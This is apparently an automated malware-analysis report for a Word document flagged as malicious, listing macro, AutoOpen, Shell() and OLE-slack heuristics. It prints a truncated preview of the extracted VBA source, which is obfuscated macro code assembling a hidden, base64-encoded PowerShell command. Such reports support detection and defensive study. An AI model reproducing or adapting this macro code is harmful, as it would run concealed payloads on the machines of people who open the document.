MALICIOUS
182
Risk Score
Heuristics 6
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 109,824 bytes but its declared streams total only 36,244 bytes — 73,580 bytes (67%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17189 bytes |
SHA-256: d4d4ef00fded9b57da5a9072a07140c780f5cadbd94b6a01d67bda571c9bc0e9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "BtGDjiqGzYM" Function kwMZBuC() On Error Resume Next wrcPok = DCERqK - Cos(brVBUz) * 1 - Chr(71813) / 78175 - ChrB(GtTRXP) NNcZO = 54015 iirsI = "owersHeLL -Wi" + "nDowsTyle hidde" + "n -e KAAo" + "ACIAewAxADMAOQB" + "9AHsANgB9AHsAOQ" + "AxAH0AewA3ADQ" + "AfQB7ADEAMQA" XqbmD = AzkIlG - Cos(zzszvK) * 1 - Chr(88203) / 40761 - ChrB(USVot) EOkTzq = 97241 CTDUX = "wAH0AewAyADkAf" + "QB7ADgAMwB" + "9AHsAMg" + "A2AH0AewA" + "4AH0AewA5ADA" sLhoz = JKfQd - Cos(NVcdE) * 1 - Chr(65811) / 60785 - ChrB(WIQPG) uWXSH = 92438 PjiBpTndO = "AfQB7AD" + "EAMQAxAH0AewAxA" + "H0AewA5ADMAf" + "QB7ADEAMAA5A" + "H0AewAxADQAM" pzoNVw = MJmEL - Cos(dilHPR) * 1 - Chr(20661) / 95134 - ChrB(kuSioM) nNJjMX = 42850 PaDGQOL = "wB9AH" + "sAOAAwAH0A" + "ewA2ADMAfQ" + "B7ADgAM" + "QB9AHsAOAA2AH" + "0AewAxADIA" + "MAB9AHsAO" + "QA2AH0AewA" + "4ADcAfQB7ADI" + "ANAB9AHsAMQ" PilSoM = MEYfM - Cos(QCplBB) * 1 - Chr(28130) / 88996 - ChrB(nIAZWZ) iUGMzr = 63393 mAcjiCjdpNS = "AzADcAfQ" + "B7ADkAN" + "QB9AHsAMQAxADY" + "AfQB7ADYAMQB" + "9AHsAMQAyADUA" + "fQB7ADE" + "AMwAzAH0AewAxAD" + "AAMwB9AHsANA" sJbPiO = IACWK - Cos(vLVHt) * 1 - Chr(39623) / 90698 - ChrB(ROpwRa) YznZV = 20327 sGNLuO = "A1AH0Ae" + "wA2ADkAfQB7ADQ" + "AfQB7ADEA" + "MwB9A" + "HsAMgA3A" sazMhd = zXAOai - Cos(kEDWl) * 1 - Chr(3027) / 51634 - ChrB(mSQnFj) OzoJC = 36939 fpcPzDIA = "H0AewAx" + "ADIAMgB9AHsANAA" + "yAH0A" + "ewA3AD" + "UAfQB7" + "ADEAMwA1AH0" + "AewA0ADcAfQB7A" IhnRiS = phqruo - Cos(kCkIRz) * 1 - Chr(76683) / 62999 - ChrB(tYPwJD) Rfqpw = 42093 tiYGpkw = "DEAMgA4AH0Aew" + "A1ADMAfQB7ADYAN" + "wB9AHsAMQA0ADAA" + "fQB7ADEAMQA5A" UWIEzl = wKvGi - Cos(EAkWHb) * 1 - Chr(72417) / 89269 - ChrB(PThlHY) EwzOT = 29934 CDnuOJAz = "H0AewA2ADIAfQB" + "7ADUANQB9AHs" + "AMQAzA" + "DQAfQB" + "7ADMAMAB9AHsAMw" + "AzAH0AewA" + "5ADkAfQB7ADEAMA" + "A2AH0AewA" kwMZBuC = iirsI + CTDUX + PjiBpTndO + PaDGQOL + mAcjiCjdpNS + sGNLuO + fpcPzDIA + tiYGpkw + CDnuOJAz End Function Function IUXizuBmja() On Error Resume Next JsqvWz = TriJU - Cos(uThVk) * 1 - Chr(78133) / 53163 - ChrB(pXLdA) FwIQap = 27018 WPJiHWJRsKt = "xADIANAB" + "9AHsAMQ" + "AwADQAfQB" + "7ADEAMgA3AH0" + "AewA5ADIAfQ" dQfPzi = cCcmHR - Cos(Rcdfni) * 1 - Chr(38405) / 39757 - ChrB(SVNHWi) ifDSp = 32449 VjtHBPEwWE = "B7ADUANwB9" + "AHsAMgA1AH0" + "AewAzADgAf" + "QB7ADEAN" + "AB9AHsAM" + "gA4AH0Aew" + "AxADkAfQB7ADE" UrwLNU = qtSVfj - Cos(vBjHJm) * 1 - Chr(26511) / 88605 - ChrB(XZtotH) wuAmJ = 76673 wNKXRkFQiE = "ANQB9AH" + "sAMgB9AHsAMQAwA" + "DEAfQB7" + "ADkANwB9" + "AHsAMQAz" + "ADEAfQB7ADEAM" + "wA4AH0Aew" TGzvbb = mqBbni - Cos(Ljiba) * 1 - Chr(14165) / 49309 - ChrB(TfpjqT) fudHKP = 1800 cqcNkUIMR = "AxADMANg" + "B9AHsAMQAxAH0Ae" + "wA1AH0AewA3AD" + "EAfQB7ADEAMQA0" + "AH0AewAxA" + "DAANQB9" + "AHsAM" qmSok = rNGdjn - Cos(VKijR) * 1 - Chr(66459) / 75494 - ChrB(GslbM) HwjUE = 19417 LCtatFGv = "QA0ADEAfQB7ADQ" + "AOQB9A" + "HsAMg" + "AyAH0AewA0ADg" + "AfQB7ADkAfQB7" + "ADUAMQB9AHsAMw" + "A1AH0AewA3ADkA" + "fQB7ADUAMgB9AHs" + "ANQAwAH0AewAx" + "ADYAf" opISp = cSjGG - Cos(MKjuas) * 1 - Chr(63179) / 26305 - ChrB(jtjMXY) OZIidq = 63231 hnbrj = "QB7ADUANgB9AH" + "sAMQAxAD" + "gAfQB7ADk" + "ANAB9AHsANg" + "A4AH0AewAx" + "ADAAf" + "QB7ADEAMwA" + "yAH0AewAzA" aNcjL = XmiwA - Cos(XDFbY) * 1 - Chr(93111) / 65002 - ChrB(vbGRd) DJzcBV = 56857 SOXnOUITH = "DIAfQB7ADE" + "AMQA1AH" + "0AewA0ADMA" + "fQB7ADQAMQB9AHs" + "ANgA0AH0A" + "ewAzADYAfQB7A" + "DIAMAB9AHsANwB" UMQAC = MHBQXY - Cos(LUhGh) * 1 - Chr(17561) / 54414 - ChrB(wHKDT) NoCufW = 16952 NiwFiLqlw = "9AHsANw" + "AyAH0AewAzADEAf" + "QB7ADEAMAA4A" + "H0AewA1ADk" IUXizuBmja = WPJiHWJRsKt + VjtHBPEwWE + wNKXRkFQiE + cqcNkUIMR + LCtatFGv + hnbrj + SOXnOUITH + NiwFiLqlw End Function Function wvQmuaJ() On Error Resume Next sLXttr = apuFfs - Cos(QWUMBp) * 1 - Chr(43316) / 9990 - ChrB(wjqwS) VsBDdb = 41811 UNKoPfFk = "AfQB7ADEAN" + "AAyAH0Aew" + "A4ADk" + "AfQB7ADMA" + "NAB9AHsAMQ" + "A3AH0AewA0AD" + "QAfQB7ADEA" nPkkYS = wnFYY - Cos(ZSVSMn) * 1 - Chr(11146) / 51857 - ChrB(CsVbU) DcPNu = 77284 GiqDpWJUhE = "MgA5AH0Ae" + "wA5ADgA ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.